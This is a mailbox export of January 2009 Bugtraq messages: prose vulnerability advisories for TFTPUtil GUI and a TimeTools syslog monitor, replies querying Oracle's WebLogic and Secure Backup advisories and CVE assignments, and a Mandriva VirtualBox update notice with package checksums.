aHRtbA0KDQpQZXJtYW5lbnQgVmVyc2lvbiBvZiB0aGUgYWR2aXNvcnk6DQpodHRwOi8vam94ZWFu
a29yZXQuY29tL2Jsb2cvP3A9NDENCg0KUHJvZmVzc2lvbmFsIFdlYjoNCmh0dHA6Ly93d3cuam94
ZWFua29yZXQuY29tDQoNClBlcnNvbmFsIEJsb2c6DQpodHRwOi8vd3d3LmpveGVhbmtvcmV0LmNv
bS9ibG9nDQoNCkRpc2NsYWltZXINCj09PT09PT09PT0NCg0KVGhlIGluZm9ybWF0aW9uIGluIHRo
aXMgYWR2aXNvcnkgYW5kIGFueSBvZiBpdHMgZGVtb25zdHJhdGlvbnMgaXMgcHJvdmlkZWQgImFz
IGlzIg0Kd2l0aG91dCBhbnkgd2FycmFudHkgb2YgYW55IGtpbmQuDQoNCkkgYW0gbm90IGxpYWJs
ZSBmb3IgYW55IGRpcmVjdCBvciBpbmRpcmVjdCBkYW1hZ2VzIGNhdXNlZCBhcyBhIHJlc3VsdCBv
ZiB1c2luZyB0aGUNCmluZm9ybWF0aW9uIG9yIGRlbW9uc3RyYXRpb25zIHByb3ZpZGVkIGluIGFu
eSBwYXJ0IG9mIHRoaXMgYWR2aXNvcnkuDQoNCn=

--=-Y1d5wnjF15zP9y7LtuBL--

--=-FHE+nIKLYvfBYNKSgYeb
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQBJblCxU6rFMEYDrlERAvfmAKCfnouWGL44+W+m6QhCXFyEVfe9oQCePOai
gBwnwN7WacqQnTmRlcUhk0g=SPQv
-----END PGP SIGNATURE-----

--=-FHE+nIKLYvfBYNKSgYeb--



______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
Llamadas a fijos y msviles desde 1 cintimo por minuto. 
http://es.voice.yahoo.com

From - Thu Jan 15 11:22:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059ed
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39186-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7CDFCED8FA
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:14:48 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D8429237407; Thu, 15 Jan 2009 08:39:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24403 invoked from network); 14 Jan 2009 23:59:56 -0000
Date: Wed, 14 Jan 2009 17:04:35 -0700
Message-Id: <200901150004.n0F04ZJQ028021@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: TFTPUtil GUI TFTP Directory Traversal
Status:   

Title: TFTPUtil GUI TFTP Directory Traversal
Product: TFTPUtil GUI

Discovered: November 26, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: k23productions
Vendor URL: http://sourceforge.net/projects/tftputil
Vendor notification date: December 1, 2008
Vendor response date: December 8, 2008
Vendor acknowledgement: December 8, 2008
Vendor provided fix: December 8, 2008
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: TFTPUtil GUI versions 1.2.0 and 1.3.0
Fixed in: 1.4.0
Risk: Medium

Vulnerability Description: TFTPUtil GUI versions 1.2.0 and 1.3.0 are prone to a directory-traversal vulnerability because it fails to sanitize TFTP GET requests. By using a specially crafted TFTP GET request an attacker is capable of retrieving files outside of the TFTP root directory.

Impact: The ability to obtain files outside of the TFTP root directory may allow an attacker to obtain more information about the underlying operating system and applications running on the host.

Keywords: security, vulnerability, tftp, directory traversal, princeofnigeria, gui, windows, server

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local and remote users

TFTPUtil GUI is an application that provides services for transferring configuration files, firmware files and other types of data using the TFTP protocol. The application should restrict GET requests to the contents of the TFTP root directory to prevent obtaining data from other parts of the host operating system.

Vulnerability Scope: The default installation of TFTPUtil 1.20. or 1.3.0 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP client software. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: 1.4.0
Vendor provided fix: 1.4.0
Workarounds: Update to 1.4.0

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Thu Jan 15 11:32:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059ee
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39187-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 75B0BED906
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:24:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0A74123740A; Thu, 15 Jan 2009 08:39:36 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24568 invoked from network); 15 Jan 2009 00:09:51 -0000
Date: Wed, 14 Jan 2009 17:16:07 -0700
Message-Id: <200901150016.n0F0G7Fs025883@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: TFTPUtil GUI TFTP Server Denial of Service Vulnerability
Status:   

[--Vulnerability Summary--]

Title: TFTPUtil GUI TFTP Server Denial of Service Vulnerability
Product: TFTPUtil GUI

Discovered: November 26, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: k23productions (as per various download sites)
Vendor URL: http://sourceforge.net/projects/tftputil
Vendor notification date: December 1, 2008
Vendor response date: December 8, 2008
Vendor acknowledgment: December 8, 2008
Vendor provided fix: December 8, 2008
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: TFTPUtil GUI versions 1.2.0 and 1.3.0
Fixed in: 1.4.0
Risk: High

Vulnerability Description: TFTPUtil GUI versions 1.2.0 and 1.3.0 are vulnerable to a remote denial-of-service vulnerability because it fails to handle user-supplied input. Sending a specially crafted TFTP request with a overlong filename will cause the application to become unstable and stop responding.

Impact: A remote or local attacker can exploit this flaw by sending a specially crafted packet to the TFTP server. Successful exploitation of this flaw will cause the TFTP server process to crash preventing valid users or devices from using the service. The TFTP server will need to be restarted to resume normal TFTP server operations.

Keywords: security, vulnerability, tftp, dos, princeofnigeria, gui, windows, server, denial, service

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local or Remote users

TFTPUtil GUI is an application that provides services for transferring configuration files, firmware files and other types of data using the TFTP protocol. The application should validate and sanitize all user input to prevent unexpected conditions.

Vulnerability Scope: The default installation of TFTPUtil 1.20. or 1.3.0 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP client software. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: 1.4.0
Vendor provided fix: 1.4.0
Workarounds: Upgrade to version 1.4.0 addresses this vulnerability

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Thu Jan 15 11:38:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059ef
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39188-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C3A51ED879
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:33:11 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 0499F23740B; Thu, 15 Jan 2009 08:40:37 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24679 invoked from network); 15 Jan 2009 00:16:10 -0000
Date: Wed, 14 Jan 2009 17:20:49 -0700
Message-Id: <200901150020.n0F0Knf7030408@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: Windows NTP Time Server Syslog Monitor 1.0.000 Denial of Service
 Vulnerability
Status:   

[--Vulnerability Summary--]

Title: Windows NTP Time Server Syslog Monitor 1.0.000 Denial of Service Vulnerability
Product: Windows NTP Time Server Syslog Monitor 1.0.000

Discovered: November 29, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: TimeTools
Vendor URL: http://www.timetools.co.uk
Vendor notification date: December 1, 2008
Vendor response date: --
Vendor acknowledgment:--
Vendor provided fix:--
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: Windows NTP Time Server Syslog Monitor 1.0.000
Fixed in: No fix currently available.
Risk: High

Vulnerability Description: Windows NTP Time Server Syslog Monitor 1.0.000 is vulnerable to a remote denial-of-service vulnerability because it fails to handle user-supplied input. Sending a specially crafted UDP Syslog request will cause the application to become unstable and stop responding.

Impact: A remote or local attacker can exploit this flaw by sending a specially crafted packet to the Syslog server. Successful exploitation of this flaw will cause the Syslog server process to crash preventing valid users or devices from using the service. The Syslog server will need to be restarted to resume normal Syslog server operations.

Keywords: security, vulnerability, syslog, princeofnigeria, windows, server, udp, dos, denial of service

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local or Remote users

Windows NTP Time Server Syslog Monitor 1.0.000 is an application that provides services for receiving system event messages to provide a centralized reporting interface for distributed system events. The application should validate and sanitize all user input to prevent unexpected conditions.

Per software download sites description: �TimeTools Windows Atomic Clock NTP Server Syslog Daemon is a free utility that runs on any Windows NT/2000/XP/2003 workstation or server. It allows any syslog messages from any Linux or Unix based syslog client to be logged and displayed.�

Vulnerability Scope: The default installation of Windows NTP Time Server Syslog Monitor 1.0.000 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw can be executed by sending a specially crafted UDP to the target server. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: None
Vendor provided fix: None
Workarounds: None available at this time, design flaw. Discontinue use of this product until a stable patch is released.

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Thu Jan 15 11:42:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f0
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39189-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C9698ED8BE
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:41:53 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 58D1323740E; Thu, 15 Jan 2009 08:41:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24963 invoked from network); 15 Jan 2009 00:37:15 -0000
Date: Thu, 15 Jan 2009 01:01:06 +0000 (UTC)
From: security curmudgeon <jericho@attrition.org>
To: bugtraq@securityfocus.com
Cc: trees@assurent.com, support@bea.com,
Oracle Security Alerts <secalert_us@oracle.com>
Subject: Re: Assurent VR - Oracle BEA WebLogic Server Apache Connector Buffer
 Overflow
In-Reply-To: <20090113225723.79AD368018E@sticky.vrt.telus.com>
Message-ID: <Pine.LNX.4.64.0901150040320.13704@forced.attrition.org>
References: <20090113225723.79AD368018E@sticky.vrt.telus.com>
X-Attrition: Attrition is only good when forced. http://attrition.org
X-OSVDB: Everything is vulnerable. http://osvdb.org
X-Message-Flag: WARNING: Over 75 security vulnerabilities in Microsoft Outlook as of Feb 15 2008!
X-Copyright: This e-mail copyright 2008 by jericho@attrition.org where applicable
X-Encryption: rot26
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:   



Hello Assurent & Oracle,

On Tue, 13 Jan 2009, VR-Subscription-noreply@assurent.com wrote:

: Oracle BEA WebLogic Server Apache Connector Buffer Overflow
: 
: Reference: http://www.bea.com/weblogic/server/
: 
: 2. Vulnerability Summary
: 
: A remotely exploitable vulnerability has been discovered in the Apache 
: Connector component of Oracle BEA WebLogic Server. Specifically, the 
: vulnerability is due to a boundary error when processing incoming HTTP 
: requests and can lead to a buffer overflow condition. This boundary 
: error can lead to a Denial of Service (DoS) condition for the Apache 
: HTTP server.
: 
: 3. Vulnerability Analysis
: 
: A remote unauthenticated attacker can exploit the vulnerability by 
: sending a malicious HTTP request to the target system. A successful 
: attack will result in a Denial of Service (DoS) condition for the Apache 
: HTTP server, including all Apache-negotiated HTTP traffic to the 
: WebLogic Server.

: Reference: https://support.bea.com/application_content/product_portlets/securityadvisories/2809.html

According to Assurent, this is a remote overflow that creates a DoS 
condition. No mention of running arbitrary code.

Oracle's advisory says:

CVSS Severity Score: 10.0 (High)
Attack Range (AV): Network
Attack Complexity (AC): Low 
Authentication Level (Au): None 
Impact Type:Complete confidentiality, integrity and availability violation 
Vulnerability Type: Denial of Service 
CVSS Base Score Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)

So it is a "Denial of Service" but results in a complete compromise of 
confidentiality, integrity and availability. A 10.0 score typically means 
remote, unauthenticated execution of attacker-controlled code. Which is 
correct?

Further, Oracle's advisory says this affects "Security vulnerability in 
WebLogic plug-ins for Apache, Sun and IIS Web servers", implying this 
affects multiple plug-ins, not just the one for Apache. The advisory also 
uses this wording further suggesting three separate plug-ins: "This 
vulnerability may impact the availability, confidentiality or integrity of 
WebLogic Server applications, which use the Apache, Sun or IIS web server 
configured with the WebLogic plug-in for Apache, Sun or IIS respectively."

Is it really one plug-in that works with all three? Or does this only 
affect an Apache plug-in?

From - Thu Jan 15 11:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39190-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7C4E7ED946
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:52:05 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id DC71323740F; Thu, 15 Jan 2009 08:41:28 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29594 invoked from network); 15 Jan 2009 01:58:42 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=OiwHJyw95A9GqVJ-TlkA:9 a=ClWkUrfSGXZlQU7twDwA:7 a=WmnnRX-Gkimm3A8DqAKQPJH77f0A:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:011 ] virtualbox
Date: Wed, 14 Jan 2009 19:29:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LNHyf-0003Cq-39@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:011
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : virtualbox
 Date    : January 14, 2009
 Affected: 2008.0, 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 A vulnerability have been discovered and corrected in VirtualBox,
 affecting versions prior to 2.0.6, which allows local users
 to overwrite arbitrary files via a symlink attack on a
 /tmp/.vbox-qateam-ipc/lock temporary file (CVE-2008-5256).
 
 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5256
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 0faad982e37288846205d6d33d590ee1  2008.0/i586/dkms-vboxadd-1.5.0-6.1mdv2008.0.i586.rpm
 ec69afc3908bd606bae77b8422e39558  2008.0/i586/dkms-vboxvfs-1.5.0-6.1mdv2008.0.i586.rpm
 c27d1bd07d9dc67f4cefbdf33472acca  2008.0/i586/dkms-virtualbox-1.5.0-6.1mdv2008.0.i586.rpm
 9964702ee96bcf6c6edf0c31835d20e7  2008.0/i586/virtualbox-1.5.0-6.1mdv2008.0.i586.rpm
 435eb23fb1847074783ee59f21afa05d  2008.0/i586/virtualbox-guest-additions-1.5.0-6.1mdv2008.0.i586.rpm
 dbf4cd4d51e6690ed54a01751d7eb6e3  2008.0/i586/x11-driver-input-vboxmouse-1.5.0-6.1mdv2008.0.i586.rpm
 89984e4e53d3eda593e1a384b97acd14  2008.0/i586/x11-driver-video-vboxvideo-1.5.0-6.1mdv2008.0.i586.rpm 
 d0edb2542a83e4ab966bb9990b9c3a88  2008.0/SRPMS/virtualbox-1.5.0-6.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 0bfb5b9d8c8a16f1e04fd490e6379e63  2008.0/x86_64/dkms-virtualbox-1.5.0-6.1mdv2008.0.x86_64.rpm
 3bc3251552c50c2ba8270a69c5f353d7  2008.0/x86_64/virtualbox-1.5.0-6.1mdv2008.0.x86_64.rpm 
 d0edb2542a83e4ab966bb9990b9c3a88  2008.0/SRPMS/virtualbox-1.5.0-6.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 c4e028f64685550f1b54d658cac8033c  2008.1/i586/dkms-vboxadd-1.5.6-1.1mdv2008.1.i586.rpm
 0ba02b82975789a2e074562c266e3880  2008.1/i586/dkms-vboxvfs-1.5.6-1.1mdv2008.1.i586.rpm
 91fb1e876d76370c40f2bc20271dcdbb  2008.1/i586/dkms-virtualbox-1.5.6-1.1mdv2008.1.i586.rpm
 42dd201c14fab3dd1ff218969f88612c  2008.1/i586/virtualbox-1.5.6-1.1mdv2008.1.i586.rpm
 5feeef63896de6093cdd6365258df60d  2008.1/i586/virtualbox-guest-additions-1.5.6-1.1mdv2008.1.i586.rpm
 3d3fc94cb178e2a6853679f01f7f4198  2008.1/i586/x11-driver-input-vboxmouse-1.5.6-1.1mdv2008.1.i586.rpm
 79b78be2abe7b3a6d8e95d547139afa4  2008.1/i586/x11-driver-video-vboxvideo-1.5.6-1.1mdv2008.1.i586.rpm 
 6c18b42e2ff43d79009dedc817fa19e9  2008.1/SRPMS/virtualbox-1.5.6-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 4d261638ff0134079fa6c52d0a368664  2008.1/x86_64/dkms-virtualbox-1.5.6-1.1mdv2008.1.x86_64.rpm
 6ccec4ff2f35d1308f73e10679651ce0  2008.1/x86_64/virtualbox-1.5.6-1.1mdv2008.1.x86_64.rpm 
 6c18b42e2ff43d79009dedc817fa19e9  2008.1/SRPMS/virtualbox-1.5.6-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 53e13912d97abe5b7044887eab1028fd  2009.0/i586/dkms-vboxadd-2.0.2-2.1mdv2009.0.i586.rpm
 9441661b095cf9c65c50c3a81f1fb89b  2009.0/i586/dkms-vboxvfs-2.0.2-2.1mdv2009.0.i586.rpm
 2977fa2971f66d6b554ab73f03b80ba6  2009.0/i586/dkms-virtualbox-2.0.2-2.1mdv2009.0.i586.rpm
 acddf8b8a168c148f1f5e7a548a610bd  2009.0/i586/virtualbox-2.0.2-2.1mdv2009.0.i586.rpm
 edfc2bc624a87ab96f238345fbe38529  2009.0/i586/virtualbox-guest-additions-2.0.2-2.1mdv2009.0.i586.rpm
 e3650d3c5fedb2dccdc4a2e108414b95  2009.0/i586/x11-driver-input-vboxmouse-2.0.2-2.1mdv2009.0.i586.rpm
 6d28714532427680f82c86fe34fee3e0  2009.0/i586/x11-driver-video-vboxvideo-2.0.2-2.1mdv2009.0.i586.rpm 
 93f4904d403da2dd75ca4d444d298846  2009.0/SRPMS/virtualbox-2.0.2-2.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 667f19d7803c5eb163364ce221b367be  2009.0/x86_64/dkms-vboxadd-2.0.2-2.1mdv2009.0.x86_64.rpm
 e4439eb5b8a5ef7e09924989058a69b8  2009.0/x86_64/dkms-vboxvfs-2.0.2-2.1mdv2009.0.x86_64.rpm
 3da3bc075de10484211b0da29a0a14cc  2009.0/x86_64/dkms-virtualbox-2.0.2-2.1mdv2009.0.x86_64.rpm
 1aba902daf9019cbcf4e62e8a64d0a82  2009.0/x86_64/virtualbox-2.0.2-2.1mdv2009.0.x86_64.rpm
 da486be54760b618a3d84e23c3ad067e  2009.0/x86_64/virtualbox-guest-additions-2.0.2-2.1mdv2009.0.x86_64.rpm
 a3adf7c94132553f43dc6a0cd765bcc8  2009.0/x86_64/x11-driver-input-vboxmouse-2.0.2-2.1mdv2009.0.x86_64.rpm
 ca82cc1b8e6b5d85d1a7601a37367562  2009.0/x86_64/x11-driver-video-vboxvideo-2.0.2-2.1mdv2009.0.x86_64.rpm 
 93f4904d403da2dd75ca4d444d298846  2009.0/SRPMS/virtualbox-2.0.2-2.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJbnEzmqjQ0CJFipgRAtaKAKCw/UI12LmoHfiopLbrwfYw9hpjYwCeII/w
cG8DdjRcqRGXazcDy+z623M=XDR6
-----END PGP SIGNATURE-----

From - Thu Jan 15 12:02:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059f2
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39191-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C33C3ED949
for <lists@securityspace.com>; Thu, 15 Jan 2009 12:01:19 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 62C7A237412; Thu, 15 Jan 2009 08:42:05 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 1397 invoked from network); 15 Jan 2009 06:22:58 -0000
Date: Thu, 15 Jan 2009 06:46:51 +0000 (UTC)
From: security curmudgeon <jericho@attrition.org>
To: bugtraq@securityfocus.com
Cc: secalert_us@oracle.com, CVE <cve@mitre.org>
Subject: Re: iDefense Security Advisory 01.13.09: Oracle Secure Backup
 Administration Server login.php Command Injection Vulnerability
In-Reply-To: <496D256A.5090502@idefense.com>
Message-ID: <Pine.LNX.4.64.0901150641440.28002@forced.attrition.org>
References: <496D256A.5090502@idefense.com>
X-Attrition: Attrition is only good when forced. http://attrition.org
X-OSVDB: Everything is vulnerable. http://osvdb.org
X-Message-Flag: WARNING: Over 75 security vulnerabilities in Microsoft Outlook as of Feb 15 2008!
X-Copyright: This e-mail copyright 2008 by jericho@attrition.org where applicable
X-Encryption: rot26
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:   


iDefense, CVE or Oracle;

The two iDefense advisories present a bit of confusion over the CVE 
assignments and number of vulnerabilities. There appear to be two 
vulnerabilities (login.php and common.php) that may have 3 CVE numbers 
assigned. Could anyone clarify?

First advisory, mail list post and original jibe suggesting common.php 
issue is CVE-2008-5449:

iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration 
Server login.php Command Injection Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2009-01/0111.html
The vulnerability is in a function of common.php which is called from the 
login.php page.
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-5449 to this issue.

Oracle Secure Backup Administration Server login.php Command Injection 
Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?idv9
The vulnerability is in a function of common.php which is called from the 
login.php page.
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-5449 to this issue.


Second advisory, mail list post and original do not match, mentioning 
CVE-2008-4006 and then CVE-2008-5448 for what appear to be login.php and 
common.php. This implies that common.php may have had two CVE assigned:

iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration 
Server login.php Command Injection Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2009-01/0110.html
The first vulnerability is in "php/login.php".
The second vulnerability is in "php/common.php". 
The Common Vulnerabilities and Exposures (CVE) project has assigned the 
name CVE-2008-4006 to this issue.

Oracle Secure Backup Administration Server login.php Command Injection 
Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?idv8
The first vulnerability is in "php/login.php". 
The second vulnerability is in "php/common.php".
